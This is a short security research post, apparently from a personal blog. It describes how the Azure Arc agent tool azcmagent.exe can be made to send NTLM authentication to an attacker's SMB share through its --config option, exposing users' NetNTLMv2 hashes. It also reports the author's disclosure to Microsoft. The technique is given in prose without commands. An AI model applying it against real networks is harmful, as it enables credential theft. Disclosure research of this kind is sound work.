Exploiting Azure Arc Management Tool to Capture NetNTLM Hashes
In a Windows network, NT LAN Manager (NTLM) is a set of Microsoft security protocols that ensure authentication, integrity, and confidentiality for users. It was the default network authentication method in the Windows NT 4.0 operating system. The latest version, NTLMv2, incorporate the NT MD4 hash function, producing 128-bit hash lengths for both local and domain accounts.
There are several methods in Windows to trigger an authentication and capture the user’s credentials using tools like Responder. If a user on the network attempts to access a machine and incorrectly types the IP address or name, Responder will respond to the request and prompt for the NTLMv2 hash to access the resource. Responder achieves this by poisoning LLMNR, mDNS, and NetBIOS requests on the network. Without proper mitigations, Windows can be easily manipulated to leak hashes. Any document format that supports loading external files via UNC paths is susceptible to this vulnerability. However, it’s important to note that an attacker must still persuade the user to perform a specific action.
In this short article, I want to introduce another “living off the land” tool that I’ve recently been exploring. This tool can be used to trigger a user to authenticate over a target, demonstrating both its practical application and potential risks.
The Azure Connected Machine agent command-line tool, azcmagent.exe, is used to manage Azure Arc. It assists in configuring, managing, and troubleshooting a server’s connection with Azure Arc. Installed alongside the Azure Connected Machine agent, azcmagent.exe controls actions specific to the server where it is running. Once the server is connected to Azure Arc, the Azure CLI or Azure PowerShell module can be used to enable extensions, manage tags, and perform various operations on the server resource.
An interesting aspect of azcmagent.exe is that it is a standard PE file that can be easily moved to a target machine and triggered using PowerShell. While many of its functions require local administrator permissions, there are others that do not require special permissions. One such option is --config, which is used to obtain the configuration the tool will use to set up the Azure Arc instance. This call is not limited to local files; it can also be used as a network call to force NTLM authentication.
To demonstrate the potential misuse of this tool for offensive purposes, I set up my own SMB server using impacket’s smbclient.py. I then targeted my attacker’s SMB share using azcmagent.exe with the vulnerable options. As shown in the image, I successfully captured the NTLMv2 hash of the user running the tool.
This example highlights how seemingly benign tools can be repurposed for malicious activities. The issue of forced authentication in Microsoft environments remains a challenging problem for Microsoft to fully address. Companies cannot completely prevent this type of attack on a fully functional Windows environment without significantly compromising user usability. It is important to be aware that new tools used by hybrid cloud services can also be exploited maliciously in Windows environments.
This finding was reported to Microsoft on May 31, 2024. After careful investigation, Microsoft Security Response Center assessed the case as having moderate severity and determined that it does not meet their criteria for immediate servicing. As a result, the case was closed.